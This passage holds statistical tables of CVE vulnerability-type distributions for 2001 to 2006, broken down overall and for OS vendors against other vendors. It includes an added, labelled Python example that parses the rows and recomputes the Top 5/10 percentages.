[ 3] dos-malform    02.8% ( 5)  02.7% ( 7)  04.4% ( 4)  02.6% ( 6)  03.5% ( 5)  01.7% ( 8)  03.3% ( 4)
     ****           05.3% ( 2)  09.2% ( 2)  08.1% ( 2)  02.5% ( 3)  07.3% ( 2)  02.1% ( 3)  03.9% ( 3)
[ 4] XSS            04.6% ( 3)  02.7% ( 8)  05.9% ( 2)  03.0% ( 5)  01.4% (10)  05.5% ( 3)  07.1% ( 2)
     ****           02.3% ( 3)  00.5% (22)  03.6% ( 4)  02.5% ( 4)  00.8% ( 8)  02.1% ( 4)  03.2% ( 4)
[ 5] format-string  04.0% ( 4)  08.6% ( 3)  02.9% ( 6)  03.0% ( 4)  04.9% ( 3)  03.7% ( 4)  02.4% ( 6)
     ****           00.8% (16)  01.4% (13)  00.6% (17)  02.0% ( 5)  00.4% (18)  00.8% (10)  00.3% (17)
[ 6] int-overflow   02.6% ( 6)  00.0% N/A   02.2% ( 7)  03.4% ( 3)  04.0% ( 4)  02.2% ( 7)  03.5% ( 3)
     ****           01.7% ( 5)  00.0% N/A   00.0% N/A   01.0% ( 7)  03.4% ( 3)  00.8% ( 8)  04.2% ( 2)
[ 7] priv           02.3% ( 7)  05.4% ( 4)  01.8% ( 8)  01.5% (12)  01.2% (11)  02.3% ( 5)  02.2% ( 7)
     ****           01.8% ( 4)  01.9% ( 8)  03.0% ( 6)  00.0% N/A   00.4% (16)  03.4% ( 2)  00.8% (13)
[ 8] perm           02.2% ( 8)  05.4% ( 5)  01.1% (13)  01.9% ( 8)  01.7% ( 7)  02.3% ( 6)  01.4% ( 9)
     ****           01.6% ( 7)  02.4% ( 6)  03.3% ( 5)  00.5% (11)  00.4% (12)  00.8% (12)  01.8% ( 5)
[ 9] dot            01.5% (10)  00.5% (18)  01.8% ( 9)  01.1% (15)  02.0% ( 6)  01.4% (12)  01.6% ( 8)
     ****           01.2% (10)  01.9% (10)  00.9% (13)  01.0% ( 9)  01.5% ( 7)  00.5% (18)  01.6% ( 7)
[10] infoleak       01.1% (13)  00.5% (19)  01.5% (12)  01.1% (13)  01.2% (12)  01.0% (14)  01.4% (10)
     ****           01.1% (13)  01.4% (12)  00.9% (12)  01.0% ( 8)  00.4% (17)  01.6% ( 5)  01.1% (10)
[11] metachar       01.5% ( 9)  03.2% ( 6)  02.9% ( 5)  01.5% (11)  00.6% (15)  01.4% (11)  00.5% (15)
     ****           00.5% (18)  01.0% (18)  01.2% (11)  00.0% N/A   00.4% (14)  00.5% (15)  00.0% N/A
[12] race           01.4% (11)  02.3% ( 9)  01.8% (10)  00.4% (19)  01.7% ( 8)  01.6% ( 9)  00.8% (13)
     ****           00.3% (24)  00.0% N/A   00.0% N/A   00.5% (10)  00.0% N/A   00.8% (14)  00.3% (21)
[13] sql-inject     01.2% (12)  00.5% (21)  00.7% (18)  01.9% ( 9)  00.9% (13)  01.6% (10)  01.4% (11)
     ****           00.4% (19)  00.0% N/A   00.6% (18)  00.5% (20)  00.4% (13)  00.0% N/A   00.8% (14)
[14] memleak        00.9% (14)  00.0% N/A   00.7% (16)  01.1% (14)  01.4% ( 9)  01.2% (13)  00.3% (24)
     ****           00.9% (15)  04.3% ( 4)  00.3% (19)  00.5% (12)  00.0% N/A   00.8% (13)  00.3% (19)
[15] crypt          00.7% (16)  01.8% (11)  00.7% (15)  01.9% ( 7)  00.0% N/A   00.4% (18)  00.3% (21)
     ****           00.9% (14)  01.0% (16)  02.1% ( 7)  00.0% N/A   00.8% (11)  00.5% (16)  00.5% (15)
[16] sandbox        00.2% (26)  00.5% (15)  00.0% N/A   00.0% N/A   00.3% (20)  00.3% (23)  00.0% N/A
     ****           01.4% ( 8)  05.3% ( 3)  04.2% ( 3)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[17] dos-flood      00.3% (21)  01.4% (12)  00.4% (24)  00.0% N/A   00.0% N/A   00.3% (24)  00.0% N/A
     ****           01.1% (11)  03.9% ( 5)  00.9% (14)  00.5% (14)  00.8% ( 9)  00.3% (19)  01.3% ( 8)
[18] relpath        00.6% (17)  01.8% (10)  00.7% (17)  00.4% (18)  00.3% (16)  00.4% (19)  00.5% (18)
     ****           00.7% (17)  01.4% (14)  00.0% N/A   00.5% (13)  01.9% ( 6)  00.0% N/A   01.1% (12)
[19] auth           00.1% (28)  00.5% (16)  00.0% N/A   00.0% N/A   00.3% (17)  00.0% N/A   00.3% (20)
     ****           01.2% ( 9)  02.4% ( 7)  02.1% ( 8)  01.5% ( 6)  00.4% (15)  01.0% ( 6)  00.3% (18)
[20] pass           00.0% (32)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (28)  00.0% N/A
     ****           01.1% (12)  00.5% (20)  01.5% (10)  00.5% (16)  02.3% ( 4)  00.8% (11)  01.1% ( 9)
[21] signedness     00.8% (15)  00.5% (17)  01.8% (11)  01.5% (10)  00.3% (19)  00.6% (17)  00.5% (16)
     ****           00.2% (29)  00.0% N/A   00.0% N/A   00.5% (17)  00.0% N/A   00.5% (17)  00.0% N/A
[22] double-free    00.6% (18)  00.0% N/A   00.4% (22)  01.1% (16)  00.9% (14)  00.3% (25)  00.8% (12)
     ****           00.2% (28)  00.0% N/A   00.0% N/A   00.5% (19)  00.8% (10)  00.3% (21)  00.0% N/A
[23] spoof          00.2% (23)  00.0% N/A   00.7% (20)  00.0% N/A   00.0% N/A   00.4% (21)  00.0% N/A
     ****           00.3% (22)  00.5% (23)  00.0% N/A   00.0% N/A   00.0% N/A   00.3% (20)  01.1% (11)
[24] form-field     00.4% (20)  00.5% (20)  00.7% (19)  00.4% (20)  00.0% N/A   00.7% (16)  00.0% N/A
     ****           00.1% (31)  00.5% (21)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[25] crlf           00.5% (19)  00.0% N/A   01.1% (14)  00.0% N/A   00.0% N/A   00.7% (15)  00.5% (17)
     ****           00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[26] rand           00.2% (22)  00.9% (13)  00.4% (21)  00.4% (17)  00.0% N/A   00.0% N/A   00.3% (22)
     ****           00.3% (23)  01.9% ( 9)  00.3% (22)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[27] default        00.1% (29)  00.0% N/A   00.0% N/A   00.0% N/A   00.3% (18)  00.0% N/A   00.3% (23)
     ****           00.4% (20)  00.5% (24)  00.6% (16)  00.0% N/A   00.0% N/A   00.8% ( 9)  00.3% (16)
[28] dos-release    00.1% (27)  00.5% (22)  00.4% (23)  00.4% (21)  00.0% N/A   00.0% N/A   00.0% N/A
     ****           00.2% (27)  01.4% (11)  00.3% (21)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[29] type-check     00.0% (34)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (26)  00.0% N/A
     ****           00.3% (21)  01.4% (15)  00.9% (15)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
[30] CF             00.1% (30)  00.9% (14)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
     ****           00.2% (26)  01.0% (19)  00.0% N/A   00.5% (18)  00.0% N/A   00.0% N/A   00.3% (22)
[31] eval-inject    00.2% (24)  00.0%
N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.4% (20) 00.5% (14) **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [32] php-include 00.2% (25) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.4% (22) 00.3% (19) **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [33] design 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A **** 00.2% (25) 00.5% (25) 00.3% (20) 00.5% (15) 00.0% N/A 00.3% (22) 00.0% N/A [34] webroot 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A **** 00.1% (30) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (20) [35] upload 00.0% (33) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (29) 00.0% N/A **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A [36] CSRF 00.0% (31) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (27) 00.0% N/A **** 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A ------------------------- UNKNOWN/UNSPECIFIED ITEMS ------------------------- n/a unk 09.7% N/A 12.2% N/A 10.3% N/A 04.5% N/A 07.8% N/A 11.5% N/A 10.1% N/A **** 25.7% N/A 13.0% N/A 15.7% N/A 20.1% N/A 23.0% N/A 26.9% N/A 45.0% N/A n/a other 19.3% N/A 13.1% N/A 20.6% N/A 15.7% N/A 10.4% N/A 15.9% N/A 39.4% N/A **** 12.4% N/A 18.8% N/A 12.7% N/A 05.0% N/A 14.9% N/A 10.7% N/A 12.4% N/A n/a not-specified 13.4% N/A 00.0% N/A 04.4% N/A 21.6% N/A 21.9% N/A 20.5% N/A 00.8% N/A **** 13.2% N/A 00.5% N/A 06.3% N/A 28.6% N/A 22.6% N/A 24.3% N/A 00.5% N/A -------------- next part --------------

Vulnerability Type Distributions in CVE - Tables


Table 1: Overall Results

Rank  Flaw  TOTAL  2001  2002  2003  2004  2005  2006
Total  16192  1434  2138  1173  2534  4538  4375
[ 1]  XSS  13.9%  02.2% (11)  08.7% ( 2)  07.5% ( 2)  10.9% ( 2)  16.0% ( 1)  21.5% ( 1)
      2247  32  187  88  276  725  939
[ 2]  buf  13.3%  19.5% ( 1)  20.3% ( 1)  22.5% ( 1)  15.4% ( 1)  09.8% ( 3)  07.9% ( 4)
      2156  279  433  264  391  445  344
[ 3]  sql-inject  08.7%  00.4% (27)  01.8% (12)  03.0% ( 4)  05.5% ( 3)  12.9% ( 2)  14.0% ( 2)
      1416  6  38  35  140  584  613
[ 4]  dot  04.7%  08.9% ( 2)  05.1% ( 3)  02.9% ( 5)  04.1% ( 4)  04.3% ( 4)  04.4% ( 5)
      764  127  110  34  104  195  194
[ 5]  php-include  03.5%  00.1% (31)  00.3% (30)  00.8% (15)  01.4% (10)  02.1% ( 6)  09.5% ( 3)
      561  1  6  9  36  95  414
[ 6]  infoleak  03.3%  02.6% ( 9)  04.2% ( 5)  02.6% ( 7)  03.7% ( 5)  03.9% ( 5)  02.6% ( 6)
      540  37  89  30  95  175  114
[ 7]  dos-malform  02.9%  04.8% ( 3)  05.1% ( 4)  02.5% ( 8)  03.4% ( 6)  01.8% ( 8)  02.0% ( 7)
      463  69  110  29  87  82  86
[ 8]  link  02.0%  04.5% ( 4)  02.1% ( 9)  03.5% ( 3)  02.8% ( 7)  01.9% ( 7)  00.5% (16)
      329  64  45  41  72  87  20
[ 9]  format-string  01.8%  03.2% ( 7)  01.8% (11)  02.7% ( 6)  02.4% ( 8)  01.7% ( 9)  01.0% (10)
      296  46  39  32  61  76  42
[10]  crypt  01.6%  03.8% ( 6)  02.7% ( 6)  01.5% ( 9)  00.9% (16)  01.5% (10)  00.9% (11)
      261  55  58  18  22  68  40
[11]  priv  01.4%  02.5% (10)  02.2% ( 8)  01.0% (12)  01.3% (11)  01.5% (11)  00.9% (12)
      233  36  46  12  32  67  40
[12]  metachar  01.3%  03.8% ( 5)  02.6% ( 7)  00.7% (17)  01.0% (14)  01.3% (12)  00.3% (20)
      218  55  56  8  26  59  14
[13]  perm  01.3%  02.7% ( 8)  01.8% (10)  01.3% (11)  00.9% (15)  01.1% (13)  01.1% ( 9)
      215  39  39  15  24  48  50
[14]  int-overflow  01.0%  00.1% (32)  00.4% (22)  01.4% (10)  01.9% ( 9)  00.8% (15)  01.2% ( 8)
      160  1  8  16  47  36  52
[15]  dos-flood  00.8%  02.0% (12)  01.7% (13)  00.5% (19)  01.2% (12)  00.2% (27)  00.4% (17)
      131  29  36  6  31  10  19
[16]  pass  00.8%  01.1% (18)  01.3% (14)  00.2% (28)  01.1% (13)  00.8% (14)  00.4% (18)
      125  16  27  2  28  36  16
[17]  auth  00.8%  01.5% (13)  01.3% (15)  00.5% (20)  00.7% (17)  00.5% (19)  00.7% (14)
      124  22  27  6  17  21  31
[18]  webroot  00.5%  00.1% (29)  00.2% (32)  00.3% (24)  00.2% (30)  00.7% (16)  00.9% (13)
      88  2  5  3  5  33  40
[19]  form-field  00.5%  00.7% (24)  00.8% (17)  00.5% (21)  00.2% (27)  00.4% (20)  00.5% (15)
      81  10  17  6  6  19  23
[20]  relpath  00.4%  00.8% (22)  00.3% (29)  00.9% (14)  00.6% (18)  00.3% (22)  00.3% (21)
      71  12  6  10  14  15  14
[21]  race  00.4%  00.5% (26)  00.4% (24)  00.6% (18)  00.4% (21)  00.6% (17)  00.3% (24)
      69  7  8  7  10  26  11
[22]  memleak  00.4%  01.1% (17)  00.2% (31)  00.4% (22)  00.5% (19)  00.3% (23)  00.2% (27)
      61  16  5  5  13  15  7
[23]  msdos-device  00.4%  01.0% (20)  00.6% (19)  00.9% (13)  00.2% (23)  00.2% (28)  00.0% (32)
      57  15  13  11  6  10  2
[24]  crlf  00.3%  ...  00.2% (33)  00.1% (30)  00.5% (20)  00.4% (21)  00.3% (19)
      49  0  4  1  13  17  14
[25]  default  00.3%  01.1% (16)  00.7% (18)  00.1% (33)  00.2% (26)  00.1% (33)  00.1% (29)
      48  16  16  1  6  3  6
[26]  spoof  00.3%  01.0% (19)  00.3% (28)  00.1% (32)  00.1% (33)  00.2% (26)  00.3% (25)
      48  15  7  1  3  11  11
[27]  sandbox  00.3%  01.2% (15)  01.0% (16)  ...  00.2% (29)  00.0% (34)  ...
      46  17  22  0  5  2  0
[28]  rand  00.3%  01.2% (14)  00.6% (20)  00.3% (25)  00.2% (32)  00.0% (35)  00.2% (26)
      45  17  12  3  4  2  7
[29]  upload  00.3%  ...  00.0% (36)  00.1% (29)  00.2% (24)  00.5% (18)  00.3% (22)
      43  0  1  1  6  22  13
[30]  signedness  00.2%  00.1% (30)  00.4% (23)  00.8% (16)  00.2% (25)  00.3% (24)  00.0% (34)
      38  1  8  9  6  12  2
[31]  dos-release  00.2%  00.9% (21)  00.5% (21)  00.2% (27)  00.2% (31)  ...  ...
      30  13  10  2  5  0  0
[32]  CF  00.2%  00.7% (23)  00.3% (27)  00.2% (26)  ...  00.1% (31)  00.1% (28)
      29  10  7  2  0  4  6
[33]  eval-inject  00.2%  ...  ...  ...  00.0% (34)  00.2% (25)  00.3% (23)
      25  0  0  0  1  11  13
[34]  design  00.1%  00.6% (25)  00.4% (26)  00.1% (31)  00.0% (35)  00.1% (32)  00.0% (31)
      23  8  8  1  1  3  2
[35]  double-free  00.1%  ...  00.1% (34)  00.3% (23)  00.2% (22)  00.1% (30)  00.1% (30)
      21  0  2  4  6  5  4
[36]  CSRF  00.1%  ...  00.0% (35)  ...  00.2% (28)  00.2% (29)  00.0% (33)
      16  0  1  0  5  8  2
[37]  type-check  00.1%  00.4% (28)  00.4% (25)  ...  ...  00.0% (36)  00.0% (35)
      16  6  8  0  0  1  1
UNKNOWN/UNSPECIFIED ITEMS
n/a  unk  09.0%  07.9%  07.1%  07.0%  08.2%  08.9%  11.5%
      1460  114  151  82  209  402  502
n/a  other  15.2%  16.7%  19.0%  11.8%  17.2%  13.1%  14.9%
      2468  239  407  139  435  595  653
n/a  not-specified  06.9%  00.1%  03.1%  20.5%  11.3%  11.3%  00.3%
      1121  2  66  240  286  513  14

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top n  TOTAL  2001  2002  2003  2004  2005  2006
5  44.1  41.5  43.4  39.4  39.6  46.9  57.3
10  55.7  56.3  54.8  50.1  51.5  55.9  65.2
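As an added illustration, not part of the original post, the following Python parses the flattened row format used in the tables above (the first 14 rows of Table 1 serve as sample input), rebuilds the "Top 5 / 10" figures by summing the displayed percentages of the flaws ranked 1..N in each column, and cross-checks every displayed percentage against its raw count and the column total; the row layout and the TOTALS dictionary are taken from Table 1 as shown here.

```python
# Added example (not from the original post): parse the flattened CVE flaw-type
# rows above and rebuild the "Top 5 / 10" shares the way the page does, i.e. by
# summing the displayed (already rounded) percentages of the flaws ranked 1..N.
import re
from dataclasses import dataclass, field
from decimal import Decimal, ROUND_HALF_UP

YEARS = ("TOTAL", "2001", "2002", "2003", "2004", "2005", "2006")
# Column denominators, copied from the "Total" line of Table 1.
TOTALS = {"TOTAL": 16192, "2001": 1434, "2002": 2138, "2003": 1173,
          "2004": 2534, "2005": 4538, "2006": 4375}
# Constructed sample input: the first 14 rows of Table 1, copied verbatim
# (percentage/rank line, then the raw counts in the same column order).
SAMPLE = """\
[ 1]XSS13.9%02.2% (11)08.7% ( 2)07.5% ( 2)10.9% ( 2)16.0% ( 1)21.5% ( 1)
2247 32 187 88 276 725 939
[ 2]buf13.3%19.5% ( 1)20.3% ( 1)22.5% ( 1)15.4% ( 1)09.8% ( 3)07.9% ( 4)
2156 279 433 264 391 445 344
[ 3]sql-inject08.7%00.4% (27)01.8% (12)03.0% ( 4)05.5% ( 3)12.9% ( 2)14.0% ( 2)
1416 6 38 35 140 584 613
[ 4]dot04.7%08.9% ( 2)05.1% ( 3)02.9% ( 5)04.1% ( 4)04.3% ( 4)04.4% ( 5)
764 127 110 34 104 195 194
[ 5]php-include03.5%00.1% (31)00.3% (30)00.8% (15)01.4% (10)02.1% ( 6)09.5% ( 3)
561 1 6 9 36 95 414
[ 6]infoleak03.3%02.6% ( 9)04.2% ( 5)02.6% ( 7)03.7% ( 5)03.9% ( 5)02.6% ( 6)
540 37 89 30 95 175 114
[ 7]dos-malform02.9%04.8% ( 3)05.1% ( 4)02.5% ( 8)03.4% ( 6)01.8% ( 8)02.0% ( 7)
463 69 110 29 87 82 86
[ 8]link02.0%04.5% ( 4)02.1% ( 9)03.5% ( 3)02.8% ( 7)01.9% ( 7)00.5% (16)
329 64 45 41 72 87 20
[ 9]format-string01.8%03.2% ( 7)01.8% (11)02.7% ( 6)02.4% ( 8)01.7% ( 9)01.0% (10)
296 46 39 32 61 76 42
[10]crypt01.6%03.8% ( 6)02.7% ( 6)01.5% ( 9)00.9% (16)01.5% (10)00.9% (11)
261 55 58 18 22 68 40
[11]priv01.4%02.5% (10)02.2% ( 8)01.0% (12)01.3% (11)01.5% (11)00.9% (12)
233 36 46 12 32 67 40
[12]metachar01.3%03.8% ( 5)02.6% ( 7)00.7% (17)01.0% (14)01.3% (12)00.3% (20)
218 55 56 8 26 59 14
[13]perm01.3%02.7% ( 8)01.8% (10)01.3% (11)00.9% (15)01.1% (13)01.1% ( 9)
215 39 39 15 24 48 50
[14]int-overflow01.0%00.1% (32)00.4% (22)01.4% (10)01.9% ( 9)00.8% (15)01.2% ( 8)
160 1 8 16 47 36 52
"""

ROW_RE = re.compile(r"^\[\s*(\d+)\]([A-Za-z-]+)(\d\d\.\d)%(.*)$")
CELL_RE = re.compile(r"(\d\d\.\d)% \(\s*(\d+)\)|(\.\.\.)")  # "..." = no entries

@dataclass
class Row:
    flaw: str
    pct: dict = field(default_factory=dict)    # year -> Decimal or None
    rank: dict = field(default_factory=dict)   # year -> int or None
    count: dict = field(default_factory=dict)  # year -> int

def parse_table(text):
    """Turn the two-line-per-flaw layout into Row objects."""
    rows, current = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            current = Row(m.group(2))
            current.rank["TOTAL"] = int(m.group(1))  # "[ n]" is the TOTAL rank
            current.pct["TOTAL"] = Decimal(m.group(3))
            cells = CELL_RE.findall(m.group(4))
            if len(cells) != len(YEARS) - 1:
                raise ValueError("unexpected number of cells: " + line)
            for year, (pct, rank, dots) in zip(YEARS[1:], cells):
                current.pct[year] = None if dots else Decimal(pct)
                current.rank[year] = None if dots else int(rank)
            rows.append(current)
        elif current is not None and re.fullmatch(r"[\d ]+", line.strip()):
            current.count = dict(zip(YEARS, (int(x) for x in line.split())))
            current = None
    return rows

def top_n_share(rows, year, n):
    """Sum of the displayed percentages of the flaws ranked 1..n in `year`."""
    picked = {r.rank[year]: r.pct[year] for r in rows
              if r.rank[year] is not None and r.rank[year] <= n}
    if sorted(picked) != list(range(1, n + 1)):
        raise ValueError(f"rows ranked 1..{n} for {year} are not all present")
    return sum(picked.values(), Decimal("0.0"))

def percentage_mismatches(rows, totals):
    """Cells whose displayed value differs from count/total rounded to 0.1%."""
    bad = []
    for r in rows:
        for year in YEARS:
            shown = r.pct[year]
            if shown is None:
                continue
            calc = (Decimal(r.count[year]) * 100 / Decimal(totals[year])
                    ).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP)
            if calc != shown:
                bad.append((r.flaw, year, str(shown), str(calc)))
    return bad
```

Because the page's Top N figures sum already-rounded column percentages, they can differ by 0.1 from a ratio of raw counts (for 2006 the Top 5 counts give 57.2%, while the page's sum is 57.3%).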


Table 2: OS Vendors

Rank  Flaw  TOTAL  2001  2002  2003  2004  2005  2006
Total  4418  443  660  527  736  1199  853
[ 1]  buf  20.0%  21.0% ( 1)  26.8% ( 1)  24.9% ( 1)  20.4% ( 1)  16.2% ( 1)  16.1% ( 1)
      882  93  177  131  150  194  137
[ 2]  link  04.0%  07.4% ( 2)  03.3% ( 4)  04.0% ( 2)  05.2% ( 2)  04.0% ( 3)  01.8% ( 5)
      177  33  22  21  38  48  15
[ 3]  dos-malform  03.7%  05.6% ( 3)  06.1% ( 2)  02.7% ( 4)  04.5% ( 4)  01.8% ( 7)  03.3% ( 4)
      162  25  40  14  33  22  28
[ 4]  XSS  03.4%  01.6% (12)  04.4% ( 3)  03.0% ( 3)  01.4% ( 7)  04.2% ( 2)  04.7% ( 3)
      152  7  29  16  10  50  40
[ 5]  int-overflow  02.7%  ...  01.2% (12)  02.3% ( 6)  04.6% ( 3)  02.1% ( 6)  04.7% ( 2)
      119  0  8  12  34  25  40
[ 6]  format-string  02.4%  05.2% ( 4)  01.5% (10)  02.3% ( 5)  02.6% ( 5)  02.4% ( 5)  01.6% ( 7)
      107  23  10  12  19  29  14
[ 7]  priv  02.0%  04.1% ( 5)  02.3% ( 6)  00.8% (13)  00.8% (14)  02.6% ( 4)  01.6% ( 6)
      88  18  15  4  6  31  14
[ 8]  perm  01.8%  04.1% ( 6)  02.1% ( 7)  01.1% (11)  01.1% (10)  01.7% ( 8)  01.4% ( 9)
      78  18  14  6  8  20  12
[ 9]  dot  01.4%  01.6% (13)  01.5% ( 9)  01.1% ( 8)  01.6% ( 6)  01.3% (12)  01.6% ( 8)
      64  7  10  6  12  15  14
[10]  metachar  01.2%  02.0% ( 9)  02.6% ( 5)  00.8% (16)  00.7% (17)  01.3% (11)  00.4% (19)
      53  9  17  4  5  15  3
[11]  infoleak  01.2%  00.9% (20)  01.2% (13)  01.1% ( 9)  01.1% ( 9)  01.3% (10)  01.2% (10)
      52  4  8  6  8  16  10
[12]  race  01.0%  01.1% (17)  00.9% (15)  00.4% (19)  01.0% (11)  01.6% ( 9)  00.7% (13)
      45  5  6  2  7  19  6
[13]  memleak  00.8%  02.0% (10)  00.6% (19)  00.8% (14)  01.0% (12)  00.9% (14)  00.2% (23)
      37  9  4  4  7  11  2
[14]  sql-inject  00.8%  00.2% (27)  00.6% (21)  01.1% (10)  00.7% (16)  00.9% (13)  00.9% (11)
      35  1  4  6  5  11  8
[15]  crypt  00.8%  01.6% (14)  01.4% (11)  01.1% ( 7)  00.4% (18)  00.4% (18)  00.5% (16)
      34  7  9  6  3  5  4
[16]  sandbox  00.7%  02.7% ( 7)  02.1% ( 8)  ...  00.1% (23)  00.2% (28)  ...
      29  12  14  0  1  2  0
[17]  relpath  00.6%  01.6% (11)  00.3% (28)  00.4% (18)  01.1% ( 8)  00.3% (27)  00.7% (14)
      28  7  2  2  8  3  6
[18]  dos-flood  00.6%  02.5% ( 8)  00.6% (20)  00.2% (22)  00.3% (20)  00.3% (25)  00.8% (12)
      28  11  4  1  2  3  7
[19]  auth  00.5%  01.4% (15)  01.1% (14)  00.6% (17)  00.3% (21)  00.3% (21)  00.2% (24)
      24  6  7  3  2  4  2
[20]  signedness  00.5%  00.2% (24)  00.9% (16)  00.9% (12)  00.4% (19)  00.6% (15)  00.2% (25)
      24  1  6  5  3  7  2
[21]  pass  00.5%  00.2% (25)  00.8% (17)  00.2% (20)  00.8% (15)  00.3% (24)  00.5% (15)
      21  1  5  1  6  4  4
[22]  double-free  00.4%  ...  00.3% (29)  00.8% (15)  00.8% (13)  00.3% (20)  00.4% (18)
      19  0  2  4  6  4  3
[23]  rand  00.3%  01.4% (16)  00.5% (22)  00.2% (27)  00.1% (24)  ...  00.2% (27)
      13  6  3  1  1  0  2
[24]  crlf  00.2%  ...  00.5% (23)  00.2% (25)  ...  00.4% (17)  00.2% (20)
      11  0  3  1  0  5  2
[25]  spoof  00.2%  00.2% (26)  00.3% (26)  ...  ...  00.3% (23)  00.5% (17)
      11  1  2  0  0  4  4
[26]  form-field  00.2%  00.5% (22)  00.3% (27)  00.2% (21)  ...  00.4% (16)  ...
      10  2  2  1  0  5  0
[27]  default  00.2%  00.2% (28)  00.5% (24)  ...  00.1% (22)  00.3% (26)  00.2% (21)
      10  1  3  0  1  3  2
[28]  type-check  00.2%  00.7% (21)  00.6% (18)  ...  ...  00.1% (30)  ...
      8  3  4  0  0  1  0
[29]  CF  00.2%  00.9% (18)  00.2% (31)  00.2% (26)  ...  ...  00.1% (29)
      7  4  1  1  0  0  1
[30]  dos-release  00.2%  00.9% (19)  00.3% (25)  00.2% (23)  ...  ...  ...
      7  4  2  1  0  0  0
[31]  php-include  00.1%  ...  ...  ...  ...  00.3% (19)  00.2% (26)
      6  0  0  0  0  4  2
[32]  eval-inject  00.1%  ...  ...  ...  ...  00.3% (22)  00.2% (22)
      6  0  0  0  0  4  2
[33]  design  00.1%  00.2% (23)  00.3% (30)  00.2% (24)  ...  00.1% (31)  ...
      5  1  2  1  0  1  0
[34]  webroot  00.0%  ...  ...  ...  ...  ...  00.1% (28)
      1  0  0  0  0  0  1
[35]  upload  00.0%  ...  ...  ...  ...  00.1% (32)  ...
      1  0  0  0  0  1  0
[36]  CSRF  00.0%  ...  ...  ...  ...  00.1% (29)  ...
      1  0  0  0  0  1  0
UNKNOWN/UNSPECIFIED ITEMS
n/a  unk  16.0%  12.4%  12.6%  10.4%  12.2%  16.1%  27.2%
      708  55  83  55  90  193  232
n/a  other  16.4%  15.3%  15.6%  12.0%  12.2%  14.4%  26.6%
      724  68  103  63  90  173  227
n/a  not-specified  14.3%  00.2%  05.9%  26.0%  24.6%  22.2%  00.8%
      631  1  39  137  181  266  7

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top n  TOTAL  2001  2002  2003  2004  2005  2006
5  33.8  43.3  43.2  36.9  37.3  29.4  30.6
10  42.6  56.6  52.7  43.6  43.6  37.9  38


Table 3: OS Vendors vs. Others

Rank  Flaw  Group  TOTAL  2001  2002  2003  2004  2005  2006
Total  OS-ven  4418  443  660  527  736  1199  853
       Other   11774  991  1478  646  1798  3339  3522
[ 1]  XSS  OS-ven  03.4%  01.6% (13)  04.4% ( 3)  03.0% ( 3)  01.4% ( 7)  04.2% ( 2)  04.7% ( 2)
                   152  7  29  16  10  50  40
           Other   17.8%  02.5% ( 8)  10.7% ( 2)  11.1% ( 2)  14.8% ( 1)  20.2% ( 1)  25.5% ( 1)
                   2095  25  158  72  266  675  899
[ 2]  buf  OS-ven  20.0%  21.0% ( 1)  26.8% ( 1)  24.9% ( 1)  20.4% ( 1)  16.2% ( 1)  16.1% ( 1)
                   882  93  177  131  150  194  137
           Other   10.8%  18.8% ( 1)  17.3% ( 1)  20.6% ( 1)  13.4% ( 2)  07.5% ( 3)  05.9% ( 4)
                   1274  186  256  133  241  251  207
[ 3]  sql-inject  OS-ven  00.8%  00.2% (27)  00.6% (19)  01.1% ( 8)  00.7% (16)  00.9% (13)  00.9% (11)
                          35  1  4  6  5  11  8
                  Other   11.7%  00.5% (26)  02.3% ( 8)  04.5% ( 3)  07.5% ( 3)  17.2% ( 2)  17.2% ( 2)
                          1381  5  34  29  135  573  605
[ 4]  dot  OS-ven  01.4%  01.6% (14)  01.5% ( 9)  01.1% (10)  01.6% ( 6)  01.3% (11)  01.6% ( 8)
                   64  7  10  6  12  15  14
           Other   05.9%  12.1% ( 2)  06.8% ( 3)  04.3% ( 4)  05.1% ( 4)  05.4% ( 4)  05.1% ( 5)
                   700  120  100  28  92  180  180
[ 5]  php-include  OS-ven  00.1%  ...  ...  ...  ...  00.3% (19)  00.2% (27)
                           6  0  0  0  0  4  2
                   Other   04.7%  00.1% (30)  00.4% (22)  01.4% (11)  02.0% ( 8)  02.7% ( 6)  11.7% ( 3)
                           555  1  6  9  36  91  412
[ 6]  infoleak  OS-ven  01.2%  00.9% (20)  01.2% (13)  01.1% (11)  01.1% ( 9)  01.3% (10)  01.2% (10)
                        52  4  8  6  8  16  10
                Other   04.1%  03.3% ( 6)  05.5% ( 4)  03.7% ( 5)  04.8% ( 5)  04.8% ( 5)  03.0% ( 6)
                        488  33  81  24  87  159  104
